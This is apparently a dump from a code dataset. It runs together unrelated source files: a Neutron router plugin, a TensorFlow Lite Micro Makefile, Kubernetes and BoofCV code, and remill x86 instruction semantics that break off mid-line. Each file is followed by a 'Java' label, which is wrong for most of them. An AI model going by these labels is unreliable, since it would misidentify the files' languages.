True # process logical global router to remove its port self._conditionally_remove_auxiliary_gateway_vip_port( context, ext_net_id, routertype_id) self._l3_plugin.add_type_and_hosting_device_info(context, global_router) if do_notify is True: for ni in self._l3_plugin.get_notifiers(context, [global_router]): if ni['notifier']: ni['notifier'].routers_updated(context, ni['routers']) def _conditionally_remove_auxiliary_gateway_port( self, context, router_id, ext_net_id, routertype_id, hosting_device_id, update_operation=False): num_rtrs = self._get_gateway_routers_count( context, ext_net_id, routertype_id, None, hosting_device_id) if ((num_rtrs <= 1 and update_operation is False) or (num_rtrs == 0 and update_operation is True)): # there are no tenant routers *on ext_net_id* that are serviced by # this global router so it's aux gw port can be deleted self._delete_auxiliary_gateway_ports(context, router_id, ext_net_id) return True return False def _conditionally_remove_auxiliary_gateway_vip_port( self, context, ext_net_id, routertype_id): filters = {routertype.TYPE_ATTR: [routertype_id], routerrole.ROUTER_ROLE_ATTR: [ROUTER_ROLE_LOGICAL_GLOBAL]} log_global_routers = self._l3_plugin.get_routers(context, filters=filters) if not log_global_routers: return self._update_ha_redundancy_level(context, log_global_routers[0], -1) log_global_router_id = log_global_routers[0]['id'] num_global_rtrs = self._get_gateway_routers_count( context, ext_net_id, routertype_id, ROUTER_ROLE_GLOBAL) if num_global_rtrs == 0: # there are no global routers *on ext_net_id* that are serviced by # this logical global router so it's aux gw VIP port can be deleted self._delete_auxiliary_gateway_ports(context, log_global_router_id, ext_net_id) filters[routerrole.ROUTER_ROLE_ATTR] = [ROUTER_ROLE_GLOBAL] total_num_global_rtrs = self._l3_plugin.get_routers_count( context, filters=filters) if total_num_global_rtrs == 0: # there are no global routers left that are serviced by this # logical global router so it can be deleted self._delete_global_router(context, log_global_router_id, True) return False def _delete_auxiliary_gateway_ports( self, context, router_id, net_id=None, port_type=DEVICE_OWNER_GLOBAL_ROUTER_GW): filters = { 'device_id': [router_id], 'device_owner': [port_type]} if net_id is not None: filters['network_id'] = [net_id] for port in self._core_plugin.get_ports(context, filters=filters): try: self._core_plugin.delete_port(context, port['id'], l3_port_check=False) except (exc.ObjectDeletedError, n_exc.PortNotFound) as e: LOG.warning(e) def _delete_global_router(self, context, global_router_id, logical=False): # ensure we clean up any stale auxiliary gateway ports self._delete_auxiliary_gateway_ports(context, global_router_id) try: if logical is True: # We use parent class method as no special operations beyond # what the base implemenation does are needed for logical # global router super(L3RouterApplianceDBMixin, self._l3_plugin).delete_router( context, global_router_id) else: self._l3_plugin.delete_router( context, global_router_id, unschedule=False) except (exc.ObjectDeletedError, l3.RouterNotFound) as e: LOG.warning(e) def _get_gateway_routers_count(self, context, ext_net_id, routertype_id, router_role, hosting_device_id=None): # Determine number of routers (with routertype_id and router_role) # that act as gateway to ext_net_id and that are hosted on # hosting_device_id (if specified). query = context.session.query(bc.Router) if router_role in [None, ROUTER_ROLE_HA_REDUNDANCY]: # tenant router roles query = query.join(models_v2.Port, models_v2.Port.id == bc.Router.gw_port_id) role_filter = expr.or_( l3_models.RouterHostingDeviceBinding.role == expr.null(), l3_models.RouterHostingDeviceBinding.role == ROUTER_ROLE_HA_REDUNDANCY) else: # global and logical global routers query = query.join(models_v2.Port, models_v2.Port.device_owner == bc.Router.id) role_filter = ( l3_models.RouterHostingDeviceBinding.role == router_role) query = query.join( l3_models.RouterHostingDeviceBinding, l3_models.RouterHostingDeviceBinding.router_id == bc.Router.id) query = query.filter( role_filter, models_v2.Port.network_id == ext_net_id, l3_models.RouterHostingDeviceBinding.router_type_id == routertype_id) if hosting_device_id is not None: query = query.filter( l3_models.RouterHostingDeviceBinding.hosting_device_id == hosting_device_id) return query.count() # ---------------- General support functions ----------------- def _update_ha_redundancy_level(self, context, logical_global_router, delta): with context.session.begin(subtransactions=True): log_g_router_db = self._l3_plugin._get_router( context, logical_global_router['id']) log_g_router_db.ha_settings.redundancy_level += delta context.session.add(log_g_router_db.ha_settings) def _router_name(self, router_id): return N_ROUTER_PREFIX + router_id def _global_router_name(self, hosting_device_id, logical=False): if logical is True: return cisco_constants.LOGICAL_ROUTER_ROLE_NAME else: return '%s-%s' % (cisco_constants.ROUTER_ROLE_NAME_PREFIX, hosting_device_id[-cisco_constants.ROLE_ID_LEN:]) @property def _core_plugin(self): return bc.get_plugin() @property def _l3_plugin(self): return bc.get_plugin(bc.constants.L3)
Java
MAKEFILE_DIR := tensorflow/lite/experimental/micro/tools/make # Pull in some convenience functions. include $(MAKEFILE_DIR)/helper_functions.inc # Try to figure out the host system HOST_OS := ifeq ($(OS),Windows_NT) HOST_OS = windows else UNAME_S := $(shell uname -s) ifeq ($(UNAME_S),Linux) HOST_OS := linux endif ifeq ($(UNAME_S),Darwin) HOST_OS := osx endif endif HOST_ARCH := $(shell if [[ $(shell uname -m) =~ i[345678]86 ]]; then echo x86_32; else echo $(shell uname -m); fi) # Override these on the make command line to target a specific architecture. For example: # make -f tensorflow/lite/Makefile TARGET=rpi TARGET_ARCH=armv7l TARGET := $(HOST_OS) TARGET_ARCH := $(HOST_ARCH) # Specify TAGS on the command line to add a particular set of specialized # implementations, for example TAGS="CMSIS disco_f746ng" to target a Discovery # STM32F746NG board, using the CMSIS library's implementations where possible. ALL_TAGS := $(TAGS) $(TARGET) INCLUDES := \ -I. \ -I$(MAKEFILE_DIR)/../../../../../ \ -I$(MAKEFILE_DIR)/../../../../../../ \ -I$(MAKEFILE_DIR)/../../../../../../../ \ -I$(MAKEFILE_DIR)/downloads/ \ -I$(MAKEFILE_DIR)/downloads/gemmlowp \ -I$(MAKEFILE_DIR)/downloads/flatbuffers/include \ -I$(OBJDIR) # This is at the end so any globally-installed frameworks like protobuf don't # override local versions in the source tree. INCLUDES += -I/usr/local/include TEST_SCRIPT := tensorflow/lite/experimental/micro/testing/test_linux_binary.sh MICROLITE_LIBS := -lm # There are no rules for compiling objects for the host system (since we don't # generate things like the protobuf compiler that require that), so all of # these settings are for the target compiler. CXXFLAGS := -O3 -DNDEBUG CXXFLAGS += --std=c++11 -g -DTF_LITE_STATIC_MEMORY CCFLAGS := -DNDEBUG -g -DTF_LITE_STATIC_MEMORY LDOPTS := -L/usr/local/lib ARFLAGS := -r TARGET_TOOLCHAIN_PREFIX := CC_PREFIX := # This library is the main target for this makefile. It will contain a minimal # runtime that can be linked in to other programs. MICROLITE_LIB_NAME := libtensorflow-microlite.a MICROLITE_TEST_SRCS := \ $(wildcard tensorflow/lite/experimental/micro/*test.cc) \ $(wildcard tensorflow/lite/experimental/micro/kernels/*test.cc) MICROLITE_TEST_HDRS := \ $(wildcard tensorflow/lite/experimental/micro/testing/*.h) MICROLITE_CC_BASE_SRCS := \ $(wildcard tensorflow/lite/experimental/micro/*.cc) \ $(wildcard tensorflow/lite/experimental/micro/kernels/*.cc) \ tensorflow/lite/c/c_api_internal.c \ tensorflow/lite/core/api/error_reporter.cc \ tensorflow/lite/core/api/flatbuffer_conversions.cc \ tensorflow/lite/core/api/op_resolver.cc \ tensorflow/lite/kernels/kernel_util.cc \ tensorflow/lite/kernels/internal/quantization_util.cc MICROLITE_CC_SRCS := $(filter-out $(MICROLITE_TEST_SRCS), $(MICROLITE_CC_BASE_SRCS)) MICROLITE_CC_SRCS := $(call specialize,$(MICROLITE_CC_SRCS)) MICROLITE_CC_HDRS := \ $(wildcard tensorflow/lite/experimental/micro/*.h) \ $(wildcard tensorflow/lite/experimental/micro/kernels/*.h) \ LICENSE \ tensorflow/lite/c/c_api_internal.h \ tensorflow/lite/c/builtin_op_data.h \ tensorflow/lite/core/api/error_reporter.h \ tensorflow/lite/core/api/flatbuffer_conversions.h \ tensorflow/lite/core/api/op_resolver.h \ tensorflow/lite/kernels/kernel_util.h \ tensorflow/lite/kernels/op_macros.h \ tensorflow/lite/kernels/padding.h \ tensorflow/lite/kernels/internal/common.h \ tensorflow/lite/kernels/internal/compatibility.h \ tensorflow/lite/kernels/internal/reference/depthwiseconv_float.h \ tensorflow/lite/kernels/internal/reference/depthwiseconv_uint8.h \ tensorflow/lite/kernels/internal/reference/fully_connected.h \ tensorflow/lite/kernels/internal/reference/softmax.h \ tensorflow/lite/kernels/internal/round.h \ tensorflow/lite/kernels/internal/tensor_ctypes.h \ tensorflow/lite/kernels/internal/types.h \ tensorflow/lite/kernels/internal/quantization_util.h \ tensorflow/lite/schema/schema_generated.h \ tensorflow/lite/version.h THIRD_PARTY_CC_HDRS := \ third_party/gemmlowp/fixedpoint/fixedpoint.h \ third_party/gemmlowp/fixedpoint/fixedpoint_sse.h \ third_party/gemmlowp/internal/detect_platform.h \ third_party/gemmlowp/LICENSE \ third_party/flatbuffers/include/flatbuffers/base.h \ third_party/flatbuffers/include/flatbuffers/stl_emulation.h \ third_party/flatbuffers/include/flatbuffers/flatbuffers.h \ third_party/flatbuffers/LICENSE.txt MAKE_PROJECT_FILES := \ README_MAKE.md \ Makefile MBED_PROJECT_FILES := \ README_MBED.md \ mbed-os.lib \ mbed_app.json # These target-specific makefiles should modify or replace options like # CXXFLAGS or LIBS to work for a specific targetted architecture. All logic # based on platforms or architectures should happen within these files, to # keep this main makefile focused on the sources and dependencies. include $(wildcard $(MAKEFILE_DIR)/targets/*_makefile.inc) ALL_TAGS += $(TARGET_ARCH) ALL_SRCS := \ $(MICROLITE_CC_SRCS) \ $(MICROLITE_TEST_SRCS) # Where compiled objects are stored. GENDIR := $(MAKEFILE_DIR)/gen/$(TARGET)_$(TARGET_ARCH)/ OBJDIR := $(GENDIR)obj/ BINDIR := $(GENDIR)bin/ LIBDIR := $(GENDIR)lib/ PRJDIR := $(GENDIR)prj/ MICROLITE_LIB_PATH := $(LIBDIR)$(MICROLITE_LIB_NAME) CXX := $(CC_PREFIX)${TARGET_TOOLCHAIN_PREFIX}g++ CC := $(CC_PREFIX)${TARGET_TOOLCHAIN_PREFIX}gcc AR := $(CC_PREFIX)${TARGET_TOOLCHAIN_PREFIX}ar # Load the examples. include $(wildcard tensorflow/lite/experimental/micro/examples/*/Makefile.inc) MICROLITE_LIB_OBJS := $(addprefix $(OBJDIR), \ $(patsubst %.cc,%.o,$(patsubst %.c,%.o,$(MICROLITE_CC_SRCS)))) MICROLITE_TEST_TARGETS := $(addprefix $(BINDIR), \ $(patsubst %_test.cc,%.test_target,$(MICROLITE_TEST_SRCS))) # For normal manually-created TensorFlow C++ source files. $(OBJDIR)%.o: %.cc @mkdir -p $(dir $@) $(CXX) $(CXXFLAGS) $(INCLUDES) -c $< -o $@ # For normal manually-created TensorFlow C source files. $(OBJDIR)%.o: %.c @mkdir -p $(dir $@) $(CC) $(CCFLAGS) $(INCLUDES) -c $< -o $@ # For normal manually-created TensorFlow ASM source files. $(OBJDIR)%.o: %.S @mkdir -p $(dir $@) $(CC) $(CCFLAGS) $(INCLUDES) -c $< -o $@ # The target that's compiled if there's no command-line arguments. all: $(MICROLITE_LIB_PATH) microlite: $(MICROLITE_LIB_PATH) # Hack for generating schema file bypassing flatbuffer parsing tensorflow/lite/schema/schema_generated.h: @cp -u tensorflow/lite/schema/schema_generated.h.OPENSOURCE tensorflow/lite/schema/schema_generated.h # Gathers together all the objects we've compiled into a single '.a' archive. $(MICROLITE_LIB_PATH): tensorflow/lite/schema/schema_generated.h $(MICROLITE_LIB_OBJS) @mkdir -p $(dir $@) $(AR) $(ARFLAGS) $(MICROLITE_LIB_PATH) $(MICROLITE_LIB_OBJS) $(BINDIR)%_test : $(OBJDIR)%_test.o $(MICROLITE_LIB_PATH) @mkdir -p $(dir $@) $(CXX) $(CXXFLAGS) $(INCLUDES) \ -o $@ $< \ $(LIBFLAGS) $(MICROLITE_LIB_PATH) $(LDFLAGS) $(MICROLITE_LIBS) $(BINDIR)%.test_target: $(BINDIR)%_test $(TEST_SCRIPT) $< '~~~ALL TESTS PASSED~~~' # Generate standalone makefile projects for all of the test targets. $(foreach TEST_TARGET,$(MICROLITE_TEST_SRCS),\ $(eval $(call microlite_test,$(notdir $(basename $(TEST_TARGET))),$(TEST_TARGET)))) test: test_micro_speech $(MICROLITE_TEST_TARGETS) # Gets rid of all generated files. clean: rm -rf $(MAKEFILE_DIR)/gen $(DEPDIR)/%.d: ; .PRECIOUS: $(DEPDIR)/%.d .PRECIOUS: $(BINDIR)%_test -include $(patsubst %,$(DEPDIR)/%.d,$(basename $(ALL_SRCS)))
Java
# aitproject
Java
/* Copyright 2017 The Kubernetes Authors. Licensed under the Apache License, Version 2.0 (the "License"); you may not use this file except in compliance with the License. You may obtain a copy of the License at http://www.apache.org/licenses/LICENSE-2.0 Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions and limitations under the License. */ package version import ( "fmt" "os" "runtime" ) var ( // Version shows the version of kube batch. Version = "Not provided." // GitSHA shoows the git commit id of kube batch. GitSHA = "Not provided." // Built shows the built time of the binary. Built = "Not provided." ) // PrintVersionAndExit prints versions from the array returned by Info() and exit func PrintVersionAndExit(apiVersion string) { for _, i := range Info(apiVersion) { fmt.Printf("%v\n", i) } os.Exit(0) } // Info returns an array of various service versions func Info(apiVersion string) []string { return []string{ fmt.Sprintf("API Version: %s", apiVersion), fmt.Sprintf("Version: %s", Version), fmt.Sprintf("Git SHA: %s", GitSHA), fmt.Sprintf("Built At: %s", Built), fmt.Sprintf("Go Version: %s", runtime.Version()), fmt.Sprintf("Go OS/Arch: %s/%s", runtime.GOOS, runtime.GOARCH), } }
Java
# Display a scene Display a scene with a terrain surface and some imagery. ![](screenshot.png) ## Use case Scene views are 3D representations of real-world areas and objects. Scene views are helpful for visualizing complex datasets where 3D relationships, topography, and elevation of elements are important factors. ## How to use the sample When loaded, the sample will display a scene. Pan and zoom to explore the scene. ## How it works 1. Create a `Scene` object with a basemap using the `BasemapImageryWithLabels`. 2. Create an `ArcGISTiledElevationSource` object and add it to the scene's base surface. 3. Create a `SceneView` object to display the map. 4. Set the scene to the scene view. ## Relevant API * ArcGISTiledElevationSource * Scene * SceneView ## Tags 3D, basemap, elevation, scene, surface
Java
package no.dusken.momus.model.websocket; public enum Action { CREATE, UPDATE, DELETE }
Java
/* * Copyright (c) 2021, Peter Abeles. All Rights Reserved. * * This file is part of BoofCV (http://boofcv.org). * * Licensed under the Apache License, Version 2.0 (the "License"); * you may not use this file except in compliance with the License. * You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. * See the License for the specific language governing permissions and * limitations under the License. */ package boofcv.demonstrations.imageprocessing; import boofcv.abst.distort.FDistort; import boofcv.alg.filter.kernel.GKernelMath; import boofcv.alg.filter.kernel.SteerableKernel; import boofcv.alg.misc.GImageStatistics; import boofcv.core.image.GeneralizedImageOps; import boofcv.gui.ListDisplayPanel; import boofcv.gui.SelectAlgorithmPanel; import boofcv.gui.image.VisualizeImageData; import boofcv.struct.convolve.Kernel2D; import boofcv.struct.image.ImageGray; import javax.swing.*; import java.awt.*; import java.awt.image.BufferedImage; import java.util.ArrayList; import java.util.List; /** * Visualizes steerable kernels. * * @author Peter Abeles */ public abstract class DisplaySteerableBase<T extends ImageGray<T>, K extends Kernel2D> extends SelectAlgorithmPanel { protected static int imageSize = 400; protected static int radius = 100; protected Class<T> imageType; protected Class<K> kernelType; ListDisplayPanel basisPanel = new ListDisplayPanel(); ListDisplayPanel steerPanel = new ListDisplayPanel(); T largeImg; List<DisplayGaussianKernelApp.DerivType> order = new ArrayList<>(); protected DisplaySteerableBase( Class<T> imageType, Class<K> kernelType ) { this.imageType = imageType; this.kernelType = kernelType; largeImg = GeneralizedImageOps.createSingleBand(imageType, imageSize, imageSize); addAlgorithm("Deriv X", new DisplayGaussianKernelApp.DerivType(1, 0)); addAlgorithm("Deriv XX", new DisplayGaussianKernelApp.DerivType(2, 0)); addAlgorithm("Deriv XXX", new DisplayGaussianKernelApp.DerivType(3, 0)); addAlgorithm("Deriv XXXX", new DisplayGaussianKernelApp.DerivType(4, 0)); addAlgorithm("Deriv XY", new DisplayGaussianKernelApp.DerivType(1, 1)); addAlgorithm("Deriv XXY", new DisplayGaussianKernelApp.DerivType(2, 1)); addAlgorithm("Deriv XYY", new DisplayGaussianKernelApp.DerivType(1, 2)); addAlgorithm("Deriv XXXY", new DisplayGaussianKernelApp.DerivType(3, 1)); addAlgorithm("Deriv XXYY", new DisplayGaussianKernelApp.DerivType(2, 2)); addAlgorithm("Deriv XYYY", new DisplayGaussianKernelApp.DerivType(1, 3)); JPanel content = new JPanel(new GridLayout(0, 2)); content.add(basisPanel); content.add(steerPanel); setMainGUI(content); } protected abstract SteerableKernel<K> createKernel( int orderX, int orderY ); @Override public void setActiveAlgorithm( String name, Object cookie ) { DisplayGaussianKernelApp.DerivType dt = (DisplayGaussianKernelApp.DerivType)cookie; // add basis SteerableKernel<K> steerable = createKernel(dt.orderX, dt.orderY); basisPanel.reset(); for (int i = 0; i < steerable.getBasisSize(); i++) { T smallImg = GKernelMath.convertToImage(steerable.getBasis(i)); new FDistort(smallImg, largeImg).scaleExt().interpNN().apply(); double maxValue = GImageStatistics.maxAbs(largeImg); BufferedImage out = VisualizeImageData.colorizeSign(largeImg, null, maxValue); basisPanel.addImage(out, "Basis " + i); } // add steered kernels steerPanel.reset(); for (int i = 0; i <= 20; i++) { double angle = Math.PI*i/20.0; K kernel = steerable.compute(angle); T smallImg = GKernelMath.convertToImage(kernel); new FDistort(smallImg, largeImg).scaleExt().interpNN().apply(); double maxValue = GImageStatistics.maxAbs(largeImg); BufferedImage out = VisualizeImageData.colorizeSign(largeImg, null, maxValue); steerPanel.addImage(out, String.format("%5d", (int)(180.0*angle/Math.PI))); } repaint(); } }
Java
/* * Copyright (c) 2017 Trail of Bits, Inc. * * Licensed under the Apache License, Version 2.0 (the "License"); * you may not use this file except in compliance with the License. * You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. * See the License for the specific language governing permissions and * limitations under the License. */ #pragma once namespace { template <typename D, typename S> DEF_SEM(MOV, D dst, const S src) { WriteZExt(dst, Read(src)); return memory; } template <typename D1, typename S1, typename D2, typename S2> DEF_SEM(XCHG, D1 dst, S1 dst_val, D2 src, S2 src_val) { auto old_dst = Read(dst_val); auto old_src = Read(src_val); WriteZExt(dst, old_src); WriteZExt(src, old_dst); return memory; } template <typename D, typename S> DEF_SEM(MOVBE16, D dst, const S src) { WriteZExt(dst, __builtin_bswap16(Read(src))); return memory; } template <typename D, typename S> DEF_SEM(MOVBE32, D dst, const S src) { WriteZExt(dst, __builtin_bswap32(Read(src))); return memory; } #if 64 == ADDRESS_SIZE_BITS template <typename D, typename S> DEF_SEM(MOVBE64, D dst, const S src) { Write(dst, __builtin_bswap64(Read(src))); return memory; } #endif template <typename D, typename S> DEF_SEM(MOVQ, D dst, S src) { UWriteV64(dst, UExtractV64(UReadV64(src), 0)); return memory; } template <typename D, typename S> DEF_SEM(MOVD, D dst, S src) { UWriteV32(dst, UExtractV32(UReadV32(src), 0)); return memory; } template <typename D, typename S> DEF_SEM(MOVxPS, D dst, S src) { FWriteV32(dst, FReadV32(src)); return memory; } template <typename D, typename S> DEF_SEM(MOVxPD, D dst, S src) { FWriteV64(dst, FReadV64(src)); return memory; } template <typename D, typename S> DEF_SEM(MOVDQx, D dst, S src) { UWriteV128(dst, UReadV128(src)); return memory; } template <typename D, typename S> DEF_SEM(MOVLPS, D dst, S src) { auto src_vec = FReadV32(src); auto low1 = FExtractV32(src_vec, 0); auto low2 = FExtractV32(src_vec, 1); FWriteV32(dst, FInsertV32(FInsertV32(FReadV32(dst), 0, low1), 1, low2)); return memory; } DEF_SEM(MOVLHPS, V128W dst, V128 src) { auto res = FReadV32(dst); auto src1 = FReadV32(src); res = FInsertV32(res, 2, FExtractV32(src1, 0)); res = FInsertV32(res, 3, FExtractV32(src1, 1)); FWriteV32(dst, res); return memory; } DEF_SEM(MOVHLPS, V128W dst, V128 src) { auto res = FReadV32(dst); auto src1 = FReadV32(src); res = FInsertV32(res, 0, FExtractV32(src1, 2)); res = FInsertV32(res, 1, FExtractV32(src1, 3)); FWriteV32(dst, res); return memory; } template <typename D, typename S> DEF_SEM(MOVLPD, D dst, S src) { FWriteV64(dst, FInsertV64(FReadV64(dst), 0, FExtractV64(FReadV64(src), 0))); return memory; } #if HAS_FEATURE_AVX DEF_SEM(VMOVLPS, VV128W dst, V128 src1, MV64 src2) { auto low_vec = FReadV32(src2); FWriteV32( dst, FInsertV32(FInsertV32(FReadV32(src1), 0, FExtractV32(low_vec, 0)), 1, FExtractV32(low_vec, 1))); return memory; } DEF_SEM(VMOVLPD, VV128W dst, V128 src1, MV64 src2) { FWriteV64(dst, FInsertV64(FReadV64(src1), 0, FExtractV64(FReadV64(src2), 0))); return memory; } DEF_SEM(VMOVLHPS, VV128W dst, V128 src1, V128 src2) { /* DEST[63:0] ← SRC1[63:0] */ /* DEST[127:64] ← SRC2[63:0] */ /* DEST[VLMAX-1:128] ← 0 */ auto src1_vec = FReadV32(src1); auto src2_vec = FReadV32(src2); float32v4_t temp_vec = {}; temp_vec = FInsertV32(temp_vec, 0, FExtractV32(src1_vec, 0)); temp_vec = FInsertV32(temp_vec, 1, FExtractV32(src1_vec, 1)); temp_vec = FInsertV32(temp_vec, 2, FExtractV32(src2_vec, 0)); temp_vec = FInsertV32(temp_vec, 3, FExtractV32(src2_vec, 1)); FWriteV32(dst, temp_vec); return memory; } DEF_SEM(VMOVHLPS, VV128W dst, V128 src1, V128 src2) { auto src1_vec = FReadV32(src1); auto src2_vec = FReadV32(src2); float32v4_t temp_vec = {}; temp_vec = FInsertV32(temp_vec, 0, FExtractV32(src2_vec, 2)); temp_vec = FInsertV32(temp_vec, 1, FExtractV32(src2_vec, 3)); temp_vec = FInsertV32(temp_vec, 2, FExtractV32(src1_vec, 2)); temp_vec = FInsertV32(temp_vec, 3, FExtractV32(src1_vec, 3)); FWriteV32(dst, temp_vec); return memory; } #endif // HAS_FEATURE_AVX } // namespace // Fused `CALL $0; POP reg` sequences. DEF_ISEL(CALL_POP_FUSED_32) = MOV<R32W, I32>; DEF_ISEL(CALL_POP_FUSED_64) = MOV<R64W, I64>; DEF_ISEL(MOV_GPR8_IMMb_C6r0) = MOV<R8W, I8>; DEF_ISEL(MOV_MEMb_IMMb) = MOV<M8W, I8>; DEF_ISEL_RnW_In(MOV_GPRv_IMMz, MOV); DEF_ISEL_MnW_In(MOV_MEMv_IMMz, MOV); DEF_ISEL(MOVBE_GPRv_MEMv_16) = MOVBE16<R16W, M16>; DEF_ISEL(MOVBE_GPRv_MEMv_32) = MOVBE32<R32W, M32>; IF_64BIT(DEF_ISEL(MOVBE_GPRv_MEMv_64) = MOVBE64<R64W, M64>;) DEF_ISEL(MOV_GPR8_GPR8_88) = MOV<R8W, R8>; DEF_ISEL(MOV_MEMb_GPR8) = MOV<M8W, R8>; DEF_ISEL_MnW_Rn(MOV_MEMv_GPRv, MOV); DEF_ISEL_RnW_Rn(MOV_GPRv_GPRv_89, MOV); DEF_ISEL_RnW_Rn(MOV_GPRv_GPRv_8B, MOV); DEF_ISEL(MOV_GPR8_MEMb) = MOV<R8W, M8>; DEF_ISEL(MOV_GPR8_GPR8_8A) = MOV<R8W, R8>; DEF_ISEL_RnW_Mn(MOV_GPRv_MEMv, MOV); DEF_ISEL_MnW_Rn(MOV_MEMv_GPRv_8B, MOV); DEF_ISEL(MOV_AL_MEMb) = MOV<R8W, M8>; DEF_ISEL_RnW_Mn(MOV_OrAX_MEMv, MOV); DEF_ISEL(MOV_MEMb_AL) = MOV<M8W, R8>; DEF_ISEL_MnW_Rn(MOV_MEMv_OrAX, MOV); DEF_ISEL(MOV_GPR8_IMMb_D0) = MOV<R8W, I8>; DEF_ISEL(MOV_GPR8_IMMb_B0) = MOV<R8W, I8>; // https://github.com/intelxed/xed/commit/906d25 DEF_ISEL_RnW_In(MOV_GPRv_IMMv, MOV); DEF_ISEL(MOVNTI_MEMd_GPR32) = MOV<M32W, R32>; IF_64BIT(DEF_ISEL(MOVNTI_MEMq_GPR64) = MOV<M64W, R64>;) DEF_ISEL(XCHG_MEMb_GPR8) = XCHG<M8W, M8, R8W, R8>; DEF_ISEL(XCHG_GPR8_GPR8) = XCHG<R8W, R8, R8W, R8>; DEF_ISEL_MnW_Mn_RnW_Rn(XCHG_MEMv_GPRv, XCHG); DEF_ISEL_RnW_Rn_RnW_Rn(XCHG_GPRv_GPRv, XCHG); DEF_ISEL_RnW_Rn_RnW_Rn(XCHG_GPRv_OrAX, XCHG); DEF_ISEL(MOVQ_MMXq_MEMq_0F6E) = MOVQ<V64W, MV64>; DEF_ISEL(MOVQ_MMXq_GPR64) = MOVQ<V64W, V64>; DEF_ISEL(MOVQ_MEMq_MMXq_0F7E) = MOVQ<V64W, V64>; DEF_ISEL(MOVQ_GPR64_MMXq) = MOVQ<V64W, V64>; DEF_ISEL(MOVQ_MMXq_MEMq_0F6F) = MOVQ<V64W, MV64>; DEF_ISEL(MOVQ_MMXq_MMXq_0F6F) = MOVQ<V64W, V64>; DEF_ISEL(MOVQ_MEMq_MMXq_0F7F) = MOVQ<MV64W, V64>; DEF_ISEL(MOVQ_MMXq_MMXq_0F7F) = MOVQ<V64W, V64>; DEF_ISEL(MOVQ_XMMdq_MEMq_0F6E) = MOVQ<V128W, MV64>; IF_64BIT(DEF_ISEL(MOVQ_XMMdq_GPR64) = MOVQ<V128W, V64>;) DEF_ISEL(MOVQ_MEMq_XMMq_0F7E) = MOVQ<MV64W, V128>; IF_64BIT(DEF_ISEL(MOVQ_GPR64_XMMq) = MOVQ<V64W, V128>;) DEF_ISEL(MOVQ_MEMq_XMMq_0FD6) = MOVQ<MV64W, V128>; DEF_ISEL(MOVQ_XMMdq_XMMq_0FD6) = MOVQ<V128W, V128>; DEF_ISEL(MOVQ_XMMdq_MEMq_0F7E) = MOVQ<V128W, MV64>; DEF_ISEL(MOVQ_XMMdq_XMMq_0F7E) = MOVQ<V128W, V128>; #if HAS_FEATURE_AVX DEF_ISEL(VMOVQ_XMMdq_MEMq_6E) = MOVQ<VV128W, MV64>; IF_64BIT(DEF_ISEL(VMOVQ_XMMdq_GPR64q) = MOVQ<VV128W, V64>;) DEF_ISEL(VMOVQ_MEMq_XMMq_7E) = MOVQ<MV64W, V128>; IF_64BIT(DEF_ISEL(VMOVQ_GPR64q_XMMq) = MOVQ<V64W, V128>;) DEF_ISEL(VMOVQ_XMMdq_MEMq_7E) = MOVQ<VV128W, MV64>; DEF_ISEL(VMOVQ_XMMdq_XMMq_7E) = MOVQ<VV128W, V128>; DEF_ISEL(VMOVQ_MEMq_XMMq_D6) = MOVQ<MV64W, V128>; DEF_ISEL(VMOVQ_XMMdq_XMMq_D6) = MOVQ<VV128W, V128>; # if HAS_FEATURE_AVX512 DEF_ISEL(VMOVQ_XMMu64_MEMu64_AVX512) = MOVQ<VV128W, MV64>; IF_64BIT(DEF_ISEL(VMOVQ_GPR64u64_XMMu64_AVX512) = MOVQ<V64W, V128>;) IF_64BIT(DEF_ISEL(VMOVQ_XMMu64_GPR64u64_AVX512) = MOVQ<VV128W, V64>;) DEF_ISEL(VMOVQ_XMMu64_XMMu64_AVX512) = MOVQ<VV128W, V128>; DEF_ISEL(VMOVQ_MEMu64_XMMu64_AVX512) = MOVQ<MV64W, V128>; # endif // HAS_FEATURE_AVX512 #endif // HAS_FEATURE_AVX DEF_ISEL(MOVD_MMXq_MEMd) = MOVD<V32W, MV32>; DEF_ISEL(MOVD_MMXq_GPR32) = MOVD<V32W, V32>; DEF_ISEL(MOVD_MEMd_MMXd) = MOVD<MV32W, V32>; DEF_ISEL(MOVD_GPR32_MMXd) = MOVD<V32W, V32>; DEF_ISEL(MOVD_XMMdq_MEMd) = MOVD<V128W, MV32>; DEF_ISEL(MOVD_XMMdq_GPR32) = MOVD<V128W, V32>; // Zero extends. DEF_ISEL(MOVD_MEMd_XMMd) = MOVD<MV32W, V128>; DEF_ISEL(MOVD_GPR32_XMMd) = MOVD<V32W, V128>; #if HAS_FEATURE_AVX DEF_ISEL(VMOVD_XMMdq_MEMd) = MOVD<VV128W, MV32>; DEF_ISEL(VMOVD_XMMdq_GPR32d) = MOVD<VV128W, V32>; DEF_ISEL(VMOVD_MEMd_XMMd) = MOVD<MV32W, V128>; DEF_ISEL(VMOVD_GPR32d_XMMd) = MOVD<V32W, V128>; # if HAS_FEATURE_AVX512 DEF_ISEL(VMOVD_XMMu32_MEMu32_AVX512) = MOVD<VV128W, MV32>; DEF_ISEL(VMOVD_XMMu32_GPR32u32_AVX512) = MOVD<VV128W, V32>; DEF_ISEL(VMOVD_MEMu32_XMMu32_AVX512) = MOVD<MV32W, V128>; DEF_ISEL(VMOVD_GPR32u32_XMMu32_AVX512) = MOVD<V32W, V128>; # endif // HAS_FEATURE_AVX512 #endif // HAS_FEATURE_AVX DEF_ISEL(MOVAPS_XMMps_MEMps) = MOVxPS<V128W, MV128>; DEF_ISEL(MOVAPS_XMMps_XMMps_0F28) = MOVxPS<V128W, V128>; DEF_ISEL(MOVAPS_MEMps_XMMps) = MOVxPS<MV128W, V128>; DEF_ISEL(MOVAPS_XMMps_XMMps_0F29) = MOVxPS<V128W, V128>; #if HAS_FEATURE_AVX DEF_ISEL(VMOVAPS_XMMdq_MEMdq) = MOVxPS<VV128W, MV128>; DEF_ISEL(VMOVAPS_XMMdq_XMMdq_28) = MOVxPS<VV128W, VV128>; DEF_ISEL(VMOVAPS_MEMdq_XMMdq) = 